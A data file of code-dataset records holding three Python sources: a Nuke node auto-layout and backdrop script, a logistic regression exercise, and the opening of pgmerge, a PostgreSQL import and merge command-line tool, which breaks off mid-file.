+{"seq_id":"421583801","text":"# -*- coding=UTF-8 -*-\n\"\"\"Orgnize nodes layout. \"\"\"\nimport random\n\nimport nuke\n\nfrom wlf.progress import Progress, CancelledError\n\nfrom node import get_upstream_nodes\n\n__version__ = '0.5.1'\n\n\ndef autoplace(nodes=None, recursive=False):\n \"\"\"Auto place nodes.\"\"\"\n if not nodes:\n nodes = nuke.allNodes()\n elif isinstance(nodes, nuke.Node):\n nodes = [nodes]\n if recursive:\n nodes = get_upstream_nodes(nodes).union(nodes)\n nodes = Nodes(nodes)\n\n xpos, bottom = nodes.xpos, nodes.bottom\n try:\n nodes.autoplace()\n except CancelledError:\n nuke.Undo.cancel()\n print('用户取消自动摆放')\n return\n if nodes != nuke.allNodes():\n nodes.xpos, nodes.bottom = xpos, bottom\n\n\ndef is_node_inside(node, backdrop):\n \"\"\"Returns true if node geometry is inside backdropNode otherwise returns false\"\"\"\n topleft_node = [node.xpos(), node.ypos()]\n topleft_backdrop = [backdrop.xpos(), backdrop.ypos()]\n bottomright_node = [node.xpos() + node.screenWidth(),\n node.ypos() + node.screenHeight()]\n bottomright_backdrop = [\n backdrop.xpos() + backdrop.screenWidth(),\n backdrop.ypos() + backdrop.screenHeight()]\n\n topleft = (topleft_node[0] >= topleft_backdrop[0]) and (\n topleft_node[1] >= topleft_backdrop[1])\n bottomright = (bottomright_node[0] <= bottomright_backdrop[0]) and (\n bottomright_node[1] <= bottomright_backdrop[1])\n\n return topleft and bottomright\n\n\nclass Nodes(list):\n \"\"\"Geometry boder size of @nodes. \"\"\"\n y_gap = 10\n x_gap = 10\n placed_nodes = set()\n\n def __init__(self, nodes=None):\n if nodes is None:\n nodes = []\n if isinstance(nodes, nuke.Node):\n nodes = [nodes]\n if isinstance(nodes, Branches):\n nodes = nodes.nodes\n\n list.__init__(self, nodes)\n\n @property\n def xpos(self):\n \"\"\"The x position. \"\"\"\n return min(n.xpos() for n in self)\n\n @xpos.setter\n def xpos(self, value):\n extend_x = value - self.xpos\n for n in self:\n xpos = n.xpos() + extend_x\n n.setXpos(xpos)\n\n @property\n def ypos(self):\n \"\"\"The y position. \"\"\"\n return min([node.ypos() for node in self])\n\n @ypos.setter\n def ypos(self, value):\n extend_y = value - self.ypos\n for n in self:\n ypos = n.ypos() + extend_y\n n.setYpos(ypos)\n\n @property\n def width(self):\n \"\"\"The total width of all nodes. \"\"\"\n return self.right - self.xpos\n\n @property\n def max_width(self):\n \"\"\"The node width max value in this.\"\"\"\n return max(n.screenWidth() for n in self)\n\n @property\n def height(self):\n \"\"\"The total height of all nodes. \"\"\"\n return self.bottom - self.ypos\n\n @property\n def bottom(self):\n \"\"\"The bottom border of all nodes. \"\"\"\n return max([node.ypos() + node.screenHeight()\n for node in self])\n\n @bottom.setter\n def bottom(self, value):\n extend_y = value - self.bottom\n for n in self:\n ypos = n.ypos() + extend_y\n n.setYpos(ypos)\n\n @property\n def right(self):\n \"\"\"The right border of all nodes. \"\"\"\n return max(n.xpos() + n.screenWidth() for n in self)\n\n @right.setter\n def right(self, value):\n extend_x = value - self.right\n for n in self:\n xpos = n.xpos() + extend_x\n n.setXpos(xpos)\n\n def set_position(self, xpos=None, ypos=None):\n \"\"\"Move nodes to given @xpos, @ypos. 
\"\"\"\n if xpos:\n self.xpos = xpos\n if ypos:\n self.ypos = ypos\n\n def autoplace(self):\n \"\"\"Auto place nodes.\"\"\"\n backdrops_dict = {n: Nodes(n.getNodes())\n for n in self if n.Class() == 'BackdropNode'}\n\n Nodes.placed_nodes.clear()\n\n for n in self.endnodes():\n branches = Branches(\n n, nodes=list(n for n in self if n not in Nodes.placed_nodes))\n\n branches.autoplace()\n if Nodes.placed_nodes and branches.nodes:\n branches.nodes.xpos = Nodes(Nodes.placed_nodes).right + 20\n Nodes.placed_nodes.update(set(branches.nodes))\n\n left, top, right, bottom = (-10, -80, 10, 10)\n for backdrop, nodes_in_backdrop in backdrops_dict.items():\n if not nodes_in_backdrop:\n continue\n up_nodes = Nodes(n for n in get_upstream_nodes(nodes_in_backdrop)\n if n.ypos() < nodes_in_backdrop.bottom\n and n not in nodes_in_backdrop)\n if up_nodes:\n up_nodes.bottom = nodes_in_backdrop.ypos + top - self.y_gap\n up_nodes.extend(nodes_in_backdrop)\n up_nodes.ypos -= bottom\n\n for backdrop, nodes_in_backdrop in backdrops_dict.items():\n if not nodes_in_backdrop:\n continue\n backdrop.setXYpos(nodes_in_backdrop.xpos + left,\n nodes_in_backdrop.ypos + top)\n backdrop['bdwidth'].setValue(\n nodes_in_backdrop.width + (right - left))\n backdrop['bdheight'].setValue(\n nodes_in_backdrop.height + (bottom - top))\n\n nuke.Root().setModified(True)\n\n def endnodes(self):\n \"\"\"Return Nodes that has no contained downstream founded in given nodes. \"\"\"\n available_nodes = Nodes(\n n for n in self if n.Class() not in ('Viewer',))\n ret = Nodes(n for n in available_nodes\n if all(n not in available_nodes for n in n.dependent(nuke.INPUTS)))\n ret.sort(key=lambda x: len(get_upstream_nodes(x)), reverse=True)\n ret.extend(n for n in self if n not in available_nodes)\n return ret\n\n\nclass Branch(Nodes):\n \"\"\"A branch is a list of connected nodes. (e.g. [node1, node2, ... node_n]). \"\"\"\n depth = 0\n _parent_branch = None\n _parent_nodes = None\n _expanded = None\n big_branch_thershold = 10\n\n def __init__(self, node=None):\n if isinstance(node, nuke.Node):\n node = [node]\n elif node is None:\n node = []\n Nodes.__init__(self, node)\n\n def expand(self, nodes=None):\n \"\"\"Expand self to upstream 1 time, can limit in @nodes. \"\"\"\n\n if self.expanded:\n return False\n ret = Branches()\n nodes = nodes or nuke.allNodes()\n input_nodes = self[-1].dependencies(nuke.INPUTS)\n for index, input_node in enumerate(input_nodes):\n if input_node not in nodes:\n continue\n if index == 0:\n branch = self\n else:\n branch = Branch()\n branch.parent_nodes = Nodes(self[:-1])\n branch.parent_branch = self\n branch.depth = self.depth + len(self)\n branch.append(input_node)\n ret.append(branch)\n return ret\n\n @property\n def expanded(self):\n \"\"\"Return if this branch is expanded to end. \"\"\"\n if not self._expanded:\n startnode = self[-1]\n input_nodes = startnode.dependencies(nuke.INPUTS)\n self._expanded = not bool(input_nodes)\n return self._expanded\n\n def new_nodes(self):\n \"\"\"Return nodes that need to be autoplaced in this branch. \"\"\"\n return Nodes(n for n in self if n not in Branches.placed_nodes)\n\n def base_node(self, length_filter=None):\n \"\"\"Return the base node this branch splitted from. 
\"\"\"\n if length_filter is None:\n length_filter = self.big_branch_thershold\n ret = self[0]\n branch = self\n while branch:\n if branch.parent_nodes:\n ret = branch.parent_nodes[-1]\n else:\n break\n branch = branch.parent_branch\n if len(branch) >= length_filter:\n break\n return ret\n\n def prev_nodes(self):\n \"\"\"Return previous autoplaced nodes. \"\"\"\n ret = Nodes()\n if self.parent_nodes:\n ret = Nodes(n for n in get_upstream_nodes(self.base_node())\n if n not in self.new_nodes()\n and n in Branches.placed_nodes)\n return ret\n\n def autoplace(self):\n \"\"\"Autoplace nodes in this branch. \"\"\"\n nodes = self.new_nodes()\n if not nodes:\n return\n\n # nuke.zoomToFitSelected()\n # if not nuke.ask(str(self.base_node().name())):\n # raise RuntimeError\n\n # Y-axis.\n ypos = 0\n for n in nodes:\n ypos -= n.screenHeight() + self.y_gap\n n.setYpos(ypos)\n if len(nodes) < self.big_branch_thershold:\n # Place nodes accroding parent.\n if self.parent_nodes:\n nodes.bottom = self.parent_nodes.ypos - self.y_gap\n # Move other nodes up.\n up_nodes = Nodes(n for n in self.prev_nodes()\n if Nodes(n).bottom <= nodes.bottom)\n if up_nodes:\n up_nodes.bottom = nodes.ypos - nodes.y_gap\n elif self.parent_nodes:\n nodes.bottom = self.parent_nodes.ypos - self.y_gap\n\n # X-axis.\n if len(nodes) >= self.big_branch_thershold and Branches.placed_nodes:\n xpos = Nodes(Branches.placed_nodes).right + self.x_gap * 50\n else:\n xpos = 0\n\n if self.parent_nodes:\n left_nodes = Nodes(n for n in self.prev_nodes()\n if n.ypos() >= nodes.ypos\n and Nodes(n).bottom <= nodes.bottom)\n if left_nodes:\n xpos = max([left_nodes.right + self.x_gap, xpos])\n\n if self.parent_nodes:\n xpos = max([Nodes(self.parent_nodes[-1]).right + self.x_gap, xpos])\n for n in nodes:\n n.setXpos(xpos + (nodes.max_width - n.screenWidth()) / 2)\n\n @property\n def parent_nodes(self):\n \"\"\"The nodes branch expand from.\"\"\"\n return self._parent_nodes\n\n @parent_nodes.setter\n def parent_nodes(self, value):\n if not isinstance(value, list):\n raise TypeError('Expected list type. ')\n self._parent_nodes = Nodes(value)\n\n @property\n def parent_branch(self):\n \"\"\"The branch this branch expand from.\"\"\"\n return self._parent_branch\n\n @parent_branch.setter\n def parent_branch(self, value):\n if not isinstance(value, Branch):\n raise TypeError('Expected Branch type. ')\n self._parent_branch = value\n\n def total_length(self):\n \"\"\"Return length of this branch and branched to the start. \"\"\"\n parent_branch = self.parent_branch\n ret = len(self)\n while parent_branch:\n ret += len(parent_branch)\n parent_branch = parent_branch.parent_branch\n return ret\n\n def __str__(self):\n return 'Branch< {} >'.format(' -> '.join(n.name() for n in self))\n\n\nclass Branches(list):\n \"\"\"A branches is a list of branch. (e.g. [branch1, branch2, ... branch_n]). \"\"\"\n placed_nodes = set()\n\n def __init__(self, branches=None, nodes=None):\n if isinstance(branches, nuke.Node):\n branches = [Branch(branches)]\n elif isinstance(branches, Branch):\n branches = [branches]\n elif branches is None:\n branches = []\n self._nodes = nodes or nuke.allNodes()\n list.__init__(self, branches)\n if self:\n self.expand()\n\n # for i in self:\n\n def expand(self):\n \"\"\"Expand all branches to the end. 
\"\"\"\n not_done = True\n task = Progress('分析结构')\n count = 0\n while not_done:\n task.set(message='向上{}层节点'.format(count))\n count += 1\n not_done = False\n itering = list(self)\n del self[:]\n all_num = len(itering)\n for index, branch in enumerate(itering):\n if count >= 50:\n task.set(index * 100 // all_num)\n expanded = branch.expand(nodes=self._nodes)\n if expanded:\n not_done = True\n self.extend(expanded)\n else:\n self.append(branch)\n self._remove_duplicated()\n tested = set()\n for branch in self:\n for i in tested:\n if i in branch:\n branch.remove(i)\n tested.add(i)\n\n def _remove_duplicated(self):\n for branch in list(self):\n if any(set(branch).issubset(set(i)) for i in list(self) if i is not branch):\n self.remove(branch)\n\n def autoplace(self):\n \"\"\"Auto place branches. \"\"\"\n Branches.placed_nodes.clear()\n for branch in self:\n branch.autoplace()\n Branches.placed_nodes.update(branch)\n\n def __str__(self):\n return 'Branches[ {} ]'.format(', '.join(str(i) for i in self))\n\n def __contains__(self, operand):\n if isinstance(operand, Branch):\n return list.__contains__(self, operand)\n elif isinstance(operand, nuke.Node):\n return any(Branch.__contains__(i, operand) for i in self)\n else:\n raise TypeError\n\n def find(self, node):\n \"\"\"Return first @node contained branch. \"\"\"\n for branch in self:\n if node in branch:\n return branch\n\n @property\n def nodes(self):\n \"\"\"The nodes in this.\"\"\"\n ret = []\n for i in self:\n ret.extend(i)\n ret = set(ret)\n return Nodes(ret)\n\n\ndef create_backdrop(nodes, autoplace_nodes=False):\n '''\n Automatically puts a backdrop behind the selected nodes.\n\n The backdrop will be just big enough to fit all the select nodes in, with room\n at the top for some text in a large font.\n '''\n if autoplace_nodes:\n map(nuke.autoplace, nodes)\n if not nodes:\n return nuke.nodes.BackdropNode()\n nodes = Nodes(nodes)\n\n z_order = 0\n selected_backdropnodes = nuke.selectedNodes(\"BackdropNode\")\n # if there are backdropNodes selected put the new one immediately behind the farthest one\n if selected_backdropnodes:\n z_order = min([node.knob(\"z_order\").value()\n for node in selected_backdropnodes]) - 1\n else:\n # otherwise (no backdrop in selection) find the nearest backdrop\n # if exists and set the new one in front of it\n non_selected_backdropnodes = nuke.allNodes(\"BackdropNode\")\n for non_backdrop in nodes:\n for backdrop in non_selected_backdropnodes:\n if is_node_inside(non_backdrop, backdrop):\n z_order = max(z_order, backdrop.knob(\"z_order\").value() + 1)\n\n # Expand the bounds to leave a little border. Elements are offsets for left,\n # top, right and bottom edges respectively\n left, top, right, bottom = (-10, -80, 10, 10)\n\n n = nuke.nodes.BackdropNode(xpos=nodes.xpos + left,\n bdwidth=nodes.width + (right - left),\n ypos=nodes.ypos + top,\n bdheight=nodes.height + (bottom - top),\n tile_color=int(\n (random.random() * (16 - 10))) + 10,\n note_font_size=42,\n z_order=z_order)\n\n return n\n","sub_path":"lib/orgnize.py","file_name":"orgnize.py","file_ext":"py","file_size_in_byte":15526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"316340482","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport scipy.optimize as opt\nimport os\n\n#implementing zigmoid function\ndef sigmoid(z):\n rtn = 1 / (1 + np.exp(-1 * z));\n return rtn;\n\ndef visualizaSigmoid():\n nums = np.arange(-10,10,step=1);\n fig , ax = plt.subplots(figsize=(12,8));\n ax.plot(nums,sigmoid(nums),'r');\n\n\n plt.show()\n\ndef cost(theta,X,y,lam = 0):\n theta = np.matrix(theta);\n X = np.matrix(X);\n y = np.matrix(y);\n\n first = np.multiply(-y,np.log(sigmoid(X*theta.T)));\n second = np.multiply((1-y),np.log(1 - sigmoid(X*theta.T)))\n\n reg = (lam / 2 * len(X)) * np.sum(np.power(theta[:, 1:theta.shape[1]], 2))\n return np.sum(first - second) / (len(X)) + reg\n\ndef gradient(theta, X,y, lam = 0):\n theta= np.matrix(theta);\n X = np.matrix(X);\n y = np.matrix(y);\n\n reval = theta.ravel()\n parameters =int(reval.shape[1]);\n grad = np.zeros(parameters);\n\n sig = sigmoid(X * theta.T);\n error = sig - y;\n\n for i in range(parameters):\n term = np.multiply(error, X[:,i]);\n\n if ( i == 0):\n grad[i] = np.sum(term)/len(X);\n else:\n grad[i] = (np.sum(term)/ len(X)) + ((lam/len(X)) * theta[:,i]);\n\n\n return grad;\n\ndef predict(theta, X):\n probability = sigmoid(X * theta.T)\n return [1 if x >= 0.5 else 0 for x in probability]\n\ndef constructedFeatures(data2):\n degree = 5;\n x1 = data2['Test 1'];\n x2 = data2['Test 2'];\n\n data2.insert(data2.shape[1], 'Ones', 1);\n\n for i in range(1,degree):\n for j in range(0, i):\n data2['F' + str(i) + str(j)] = np.power(x1,i-j) * np.power(x2,j);\n\n data2.drop('Test 1', axis = 1, inplace = True);\n data2.drop('Test 2', axis = 1, inplace = True);\n\n return data2;\n \ndef ex2data1():\n path = os.getcwd() +'\\DATA\\ex2data1.txt'\n data = pd.read_csv(path,header = None,names=['Exam 1','Exam 2','Admitted'])\n\n positive = data[data['Admitted'].isin([1])]\n negative = data[data['Admitted'].isin([0])]\n\n fig, ax = plt.subplots(figsize=(12, 8))\n ax.scatter(positive['Exam 1'], positive['Exam 2'], s=50, c='b', marker='o', label='Admitted')\n ax.scatter(negative['Exam 1'], negative['Exam 2'], s=50, c='r', marker='x', label='Not Admitted')\n ax.legend();\n ax.set_xlabel('Exam 1 Score');\n ax.set_ylabel('Exam 2 Score');\n\n #add ones column to X:\n data.insert(0,'Ones',1,True);\n\n #set X (training) and y (target)\n cols = data.shape[1];\n X=data.iloc[:,0:cols-1];\n y=data.iloc[:,cols-1:cols];\n\n #convert to numpy arrays and init theta:\n X = np.array(X);\n y = np.array(y);\n theta = np.zeros(3);\n\n\n result = opt.fmin_tnc(func=cost, x0 =theta,fprime=gradient,args=(X,y));\n print(cost(result[0],X,y));\n\n theta_min = np.matrix(result[0]);\n predictions = predict(theta_min, X)\n correct = predictions == y;\n accuracy = (sum(map(int, correct)) % len(correct));\n print ('accuracy = {0}%'.format(accuracy));\n\ndef ex2data2():\n path = os.getcwd() + '\\data\\ex2data2.txt';\n data2 = pd.read_csv(path, header=None, names=['Test 1', 'Test 2', 'Accepted']);\n\n positive = data2[data2['Accepted'].isin([1])];\n negative = data2[data2['Accepted'].isin({0})];\n\n fig, ax = plt.subplots(figsize=(12, 8))\n ax.scatter(positive['Test 1'], positive['Test 2'], s=50, c='b', marker='o', label='Accepted');\n ax.scatter(negative['Test 1'], negative['Test 2'], s=50, c='r', marker='x', label='Rejected');\n\n ax.legend();\n\n ax.set_xlabel('Test 1 Score');\n ax.set_ylabel('Test 2 Score');\n\n data2 = constructedFeatures(data2);\n\n # set X and y (remember from above that we moved the label to column 0)\n 
cols = data2.shape[1]\r\n X2 = data2.iloc[:, 1:cols]\r\n y2 = data2.iloc[:, 0:1]\r\n\r\n # convert to numpy arrays and initialize the parameter array theta\r\n X2 = np.array(X2.values)\r\n y2 = np.array(y2.values)\r\n theta2 = np.zeros(11)\r\n\r\n lam = 1\r\n\r\n cst = cost(theta=theta2,X=X2,y=y2,lam = lam);\r\n\r\n reg = gradient(theta2, X2, y2, lam);\r\n\r\n #opt.fmin_tnc(func=cost, x0 =theta,fprime=gradient,args=(X,y));\r\n result2 = opt.fmin_tnc(func=cost, x0=theta2,fprime =gradient,args=(X2,y2,lam));\r\n\r\n theta_min = np.matrix(result2[0])\r\n predictions = predict(theta_min, X2)\r\n correct = [1 if ((a == 1 and b == 1) or (a == 0 and b == 0)) else 0 for (a, b) in zip(predictions, y2)]\r\n \r\n accuracy = 100.0 * sum(map(int, correct)) / len(correct)\r\n\r\n print('accuracy = {0}%'.format(accuracy))\r\n\r\n\r\n#Logistic Regression\r\ndef runLR():\r\n ex2data2();\r\n ","sub_path":"ML-Python/ML-Python/LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
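
A quick numeric sanity check for `cost` in the record above: with all-zero weights the sigmoid outputs 0.5 everywhere, so the unregularized cost must equal ln 2 ≈ 0.6931 regardless of the data. The toy matrix is hypothetical, and the import assumes the record's module is on `sys.path`:

```python
import numpy as np
from LogisticRegression import cost  # assumes the record's module is importable

theta = np.zeros(3)
X = np.array([[1.0, 34.6, 78.0],
              [1.0, 30.3, 43.9]])
y = np.array([[0.0], [1.0]])

print(cost(theta, X, y))  # ~0.6931, i.e. ln(2)
```
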
+{"seq_id":"489913140","text":"#!/usr/bin/env python3\n\"\"\"\npgmerge - a PostgreSQL data import and merge utility\n\nCopyright 2018-2020 Simon Muller (samullers@gmail.com)\n\"\"\"\nimport os\nimport re\nimport sys\nimport copy\nimport errno\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\nimport click\nimport sqlalchemy\nfrom appdirs import user_log_dir\n\nfrom .utils import decorate, NoExceptionFormatter, only_file_stem\nfrom .db_config import load_config_for_tables, \\\n validate_table_configs_with_schema, \\\n retrieve_password, generate_url, \\\n ConfigInvalidException\nfrom . import db_graph, db_import, db_export, db_inspect, __version__\n\nAPP_NAME = \"pgmerge\"\nLOG_FILE = os.path.join(user_log_dir(APP_NAME, appauthor=False), \"out.log\")\n\nlog = logging.getLogger()\n\n\ndef setup_logging(verbose=False): # pragma: no cover\n log_dir = os.path.dirname(LOG_FILE)\n try:\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n\n max_total_size = 1024 * 1024\n file_count = 2\n file_handler = RotatingFileHandler(LOG_FILE, mode='a', maxBytes=max_total_size / file_count,\n backupCount=file_count - 1, encoding=None, delay=0)\n except OSError as err:\n if err.errno == errno.EACCES:\n print('WARN: No permissions to create logging directory or file: ' + LOG_FILE)\n return\n raise err\n\n file_handler.setFormatter(\n logging.Formatter(\"[%(asctime)s] %(name)-10.10s %(threadName)-12.12s %(levelname)-8.8s %(message)s\"))\n file_handler.setLevel(logging.INFO)\n\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(\n NoExceptionFormatter(\"%(levelname)s: %(message)s\"))\n stream_handler.setLevel(logging.WARN)\n # Get the root logger to setup logging for all other modules\n log.addHandler(file_handler)\n log.addHandler(stream_handler)\n # Set the root level to lowest detail otherwise it's never passed on to handlers or other loggers\n log.setLevel(logging.DEBUG)\n # Example of separately controlling log level of imported modules\n # logging.getLogger(db_export.__name__).setLevel(logging.WARN)\n if verbose:\n file_handler.setLevel(logging.DEBUG)\n stream_handler.setLevel(logging.DEBUG)\n\n\ndef find_and_warn_about_cycles(table_graph, dest_tables):\n def print_message(msg):\n print(msg)\n print(\"Import might require the --disable-foreign-keys option.\")\n print()\n\n simple_cycles = db_graph.get_cycles(table_graph)\n\n relevant_cycles = [cycle for cycle in simple_cycles if len(cycle) > 1 if set(cycle).issubset(set(dest_tables))]\n if len(relevant_cycles) > 0:\n print_message(\"Table dependencies contain cycles that could prevent import:\\n\\t{}\"\n .format(relevant_cycles))\n return True\n\n self_references = [table for cycle in simple_cycles if len(cycle) == 1 for table in cycle]\n relevant_tables = [table for table in self_references if table in dest_tables]\n if len(relevant_tables) > 0:\n print_message(\"Self-referencing tables found that could prevent import: {}\"\n .format(', '.join(sorted(relevant_tables))))\n return True\n\n return False\n\n\ndef get_and_warn_about_any_unknown_tables(import_files, dest_tables, schema_tables):\n unknown_tables = set(dest_tables).difference(set(schema_tables))\n if len(unknown_tables) > 0:\n print(\"Skipping files for unknown tables:\")\n for table in unknown_tables:\n idx = dest_tables.index(table)\n print(\"\\t%s: %s\" % (table, import_files[idx]))\n del dest_tables[idx]\n del import_files[idx]\n print()\n return unknown_tables\n\n\ndef get_table_name_with_file(file_name, table_name):\n file_stem = 
only_file_stem(file_name)\n if file_stem == table_name:\n return table_name\n return '{} [{}]'.format(table_name, file_stem)\n\n\ndef import_all_new(connection, inspector, schema, import_files, dest_tables, config_per_table=None,\n file_format=None, suspend_foreign_keys=False, fail_on_warning=True):\n \"\"\"\n Imports files that introduce new or updated rows. These files have the exact structure\n of the final desired table except that they might be missing rows.\n \"\"\"\n assert len(import_files) == len(dest_tables), \"Files without matching tables\"\n if config_per_table is None:\n config_per_table = {}\n # Use copy of lists since they might be altered and are passed by reference\n import_files = list(import_files)\n dest_tables = list(dest_tables)\n\n # This should be the default (see: http://initd.org/psycopg/docs/connection.html#connection.autocommit)\n # but it helps make it clear that we're following the PostgreSQL recommendation:\n # https://www.postgresql.org/docs/current/populate.html#DISABLE-AUTOCOMMIT\n connection.autocommit = False\n\n if connection.encoding != 'UTF8':\n # raise ExportException('Database connection encoding isn\'t UTF8: {}'.format(connection.encoding))\n print(\"WARNING: Setting database connection encoding to UTF8 instead of '{}'\".format(connection.encoding))\n connection.set_client_encoding('UTF8')\n\n cursor = connection.cursor()\n\n tables = sorted(inspector.get_table_names(schema))\n unknown_tables = get_and_warn_about_any_unknown_tables(import_files, dest_tables, tables)\n\n table_graph = db_graph.build_fk_dependency_graph(inspector, schema, tables=None)\n # Sort by dependency requirements\n insertion_order = db_graph.get_insertion_order(table_graph)\n import_pairs = list(zip(import_files, dest_tables))\n import_pairs.sort(key=lambda pair: insertion_order.index(pair[1]))\n # Stats\n total_stats = {'skip': 0, 'insert': 0, 'update': 0, 'total': 0}\n error_tables = list(unknown_tables)\n\n if suspend_foreign_keys:\n db_import.disable_foreign_key_constraints(cursor)\n elif find_and_warn_about_cycles(table_graph, dest_tables) and fail_on_warning:\n log.warning(\"Import cancelled due to detected cycles\")\n return\n\n config_per_subset = convert_to_config_per_subset(config_per_table)\n for file, table in import_pairs:\n print('{}:'.format(get_table_name_with_file(file, table)))\n\n subset_name = only_file_stem(file)\n file_config = config_per_subset.get(subset_name, None)\n try:\n stats = db_import.pg_upsert(inspector, cursor, schema, table, file, file_format,\n file_config=file_config, config_per_table=config_per_table)\n except db_import.UnsupportedSchemaException as exc:\n print(\"\\tSkipping table with unsupported schema: {}\".format(exc))\n error_tables.append(table)\n continue\n\n stat_output = \"\\t skip: {0:<10} insert: {1:<10} update: {2}\".format(\n stats['skip'], stats['insert'], stats['update'])\n if stats['insert'] > 0 or stats['update'] > 0:\n click.secho(stat_output, fg='green')\n else:\n print(stat_output)\n total_stats = {k: total_stats.get(k, 0) + stats.get(k, 0) for k in set(total_stats) | set(stats)}\n\n if suspend_foreign_keys:\n db_import.enable_foreign_key_constraints(cursor)\n\n print()\n print(\"Total results:\\n\\t skip: %s \\n\\t insert: %s \\n\\t update: %s \\n\\t total: %s\" %\n (total_stats['skip'], total_stats['insert'], total_stats['update'], total_stats['total']))\n if len(error_tables) > 0:\n print(\"\\n%s tables skipped due to errors:\" % (len(error_tables)))\n print(\"\\t\" + \"\\n\\t\".join(error_tables))\n print(\"\\n%s tables imported successfully\" % (len(dest_tables) - len(error_tables),))\n\n # Transaction is committed\n connection.commit()\n\n\ndef run_in_session(engine, func):\n conn = engine.raw_connection()\n try:\n return func(conn)\n finally:\n conn.close()\n\n\ndef get_import_files_and_tables(directory, tables, config_per_table):\n if config_per_table is None:\n config_per_table = {}\n\n # Determine tables based on files in directory\n all_files = sorted([f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory, f))])\n import_files = [f for f in all_files if re.match(r\".*\\.csv\", f)]\n dest_tables = [f[:-len('.csv')] for f in import_files]\n\n # Consider subsets in config\n subsets = {table: [subset['name'] for subset in config_per_table[table]['subsets']]\n for table in config_per_table if 'subsets' in config_per_table[table]}\n subset_files = {filename: table for table in subsets for filename in subsets[table]}\n for subset_name in subset_files:\n filename = subset_name + '.csv'\n actual_table = subset_files[subset_name]\n if filename in import_files:\n # Update dest_tables with correct table\n dest_tables[import_files.index(filename)] = actual_table\n\n if tables is not None and len(tables) != 0:\n # Use only selected tables\n import_files = [\"%s.csv\" % (table,) for table in tables]\n dest_tables = tables\n\n # Check that all expected files exist\n expected_table_files = [\"%s.csv\" % (table,) for table in dest_tables]\n unknown_files = set(expected_table_files).difference(set(all_files))\n if len(unknown_files) > 0:\n print(\"No files found for the following tables:\")\n for file in unknown_files:\n print(\"\\t\", file)\n # Exit instead of returning None, which the caller would fail to unpack\n sys.exit()\n\n # Convert filenames to full paths\n import_files = [os.path.join(directory, f) for f in import_files]\n return import_files, dest_tables\n\n\ndef convert_to_config_per_subset(config_per_table):\n \"\"\"\n Subset configs combine the parent table's config with subset-level settings that override the parent's.\n \"\"\"\n subsets = {table: [subset['name'] for subset in config_per_table[table]['subsets']]\n for table in config_per_table if 'subsets' in config_per_table[table]}\n subsets_configs = {config['name']: config\n for table in config_per_table if 'subsets' in config_per_table[table]\n for config in config_per_table[table]['subsets']}\n subset_to_table = {name: table for table in subsets for name in subsets[table]}\n # Give a copy of the parent config to every subset as a base\n config_per_subset = {name: copy.deepcopy(config_per_table[subset_to_table[name]]) for name in subset_to_table}\n for subset_name in subset_to_table:\n del config_per_subset[subset_name]['subsets']\n # Overwrite keys that are defined on subset-level\n subset_config = subsets_configs[subset_name]\n for key in subset_config:\n config_per_subset[subset_name][key] = subset_config[key]\n\n # config_per_file = {(name + '.csv'): config_per_subset[name] for name in config_per_subset}\n return config_per_subset\n\n\ndef validate_schema(inspector, schema):\n if schema is None:\n schema = inspector.default_schema_name\n if schema not in inspector.get_schema_names():\n print(\"Schema not found: '{}'\".format(schema))\n sys.exit()\n return schema\n\n\ndef validate_tables(inspector, schema, tables):\n if len(tables) == 0:\n return None\n all_tables = set(inspector.get_table_names(schema))\n unknown_tables = set(tables) - all_tables\n if len(unknown_tables) > 0:\n print(\"Tables not found in database:\")\n print(\"\\t\" + \"\\n\\t\".join(unknown_tables))\n sys.exit()\n return tables\n\n\ndef 
check_table_params(ctx, param, value):\n \"\"\"\n Callback function to check table command-line arguments.\n \"\"\"\n assert param.name == 'tables'\n other_flag = 'include_dependent_tables'\n if len(value) == 0 and other_flag in ctx.params and ctx.params[other_flag] is True:\n raise click.UsageError(\n \"Illegal usage: '{}' option is only valid if '{}' arguments have been specified.\"\n .format(other_flag, param.name))\n return value\n\n\ndef load_table_config_or_exit(inspector, schema, config_file_name):\n config_per_table = None\n if config_file_name is not None:\n try:\n config_per_table = load_config_for_tables(config_file_name)\n validate_table_configs_with_schema(inspector, schema, config_per_table)\n except ConfigInvalidException as exc:\n print(exc)\n sys.exit()\n return config_per_table\n\n\ndef generate_single_table_config(directory, tables, config_per_table):\n \"\"\"\n Create a fake config such that all files found in the directory are subsets for the given table.\n \"\"\"\n assert len(tables) == 1\n table_name = tables[0]\n\n all_files = sorted([f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory, f))])\n import_files = [f for f in all_files if re.match(r\".*\\.csv\", f)]\n\n # Add subsets to config if they don't already exist\n if 'subsets' not in config_per_table[table_name]:\n config_per_table[table_name]['subsets'] = []\n current_subsets = [subset['name'] for subset in config_per_table[table_name]['subsets']]\n for name in import_files:\n if name not in current_subsets:\n config_per_table[table_name]['subsets'].append({'name': name})\n\n dest_tables = [table_name] * len(import_files)\n import_files = [os.path.join(directory, f) for f in import_files]\n return import_files, dest_tables, config_per_table\n\n\n# Shared command line options for connecting to a database\nDB_CONNECT_OPTIONS = [\n click.option('--dbname', '-d', help='Database name to connect to.', required=True),\n click.option('--host', '-h', help='Database server host or socket directory.',\n default='localhost', show_default=True),\n click.option('--port', '-p', help='Database server port.', default='5432', show_default=True),\n click.option('--username', '-U', help='Database user name.', default='postgres', show_default=True),\n click.option('--schema', '-s', default=\"public\", help='Database schema to use.',\n show_default=True),\n click.option('--no-password', '-w', is_flag=True,\n help='Never prompt for password (e.g. 
